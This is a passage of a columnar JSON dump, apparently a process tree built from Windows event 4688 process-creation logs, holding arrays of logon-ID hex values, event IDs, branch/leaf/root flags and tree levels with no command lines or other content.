0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e4\",\"0x3e4\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"EventID\":[\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\"],\"IsBranch\":[false,false,false,false,false,false,false,false,false,true,true,false,true,false,false,true,false,true,false,true,false,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,false,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,true,false,false,true,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,true,false,false,true,false,true,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,true,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,true,true,false,false,false,false,true,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,false,true,false,false,false,false,false,false,false,false,false,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,false,true,false,true,true,false,true,false,false,true,false,false,true,false,false,false,false,false,true,true,false,false],\"IsLeaf\":[false,true,true,true,true,true,true,true,true,false,false,true,false,true,true,false,true,false,true,false,true,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,true,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,true,true,true,true,false,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,true,true,false,true,true,false,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,false,true,true,false,true,false,true,true,true,true,true,true,false,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,false,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,true,true,true,true,true,true,false,false,true,true,true,true,false,true,true,true,true,true,true,true,true,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,true,true,true,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,false,true,false,true,true,true,true,true,true,true,false,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,false,true,false,false,true,false,true,true,false,true,true,false,true,true,false,true,true,false,false,true,true],\"IsRoot\":[true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,true,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false],\"Level\":[1,2,2,2,2,2,2,2,2,2,3,4,3,4,4,3,4,3,4,3,4,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,4,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,3,4,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,3,1,2,3,3,3,3,3,3,3,3,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,5,5,5,5,5,5,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,5,5,5,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,5,5,5,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,5,5,5,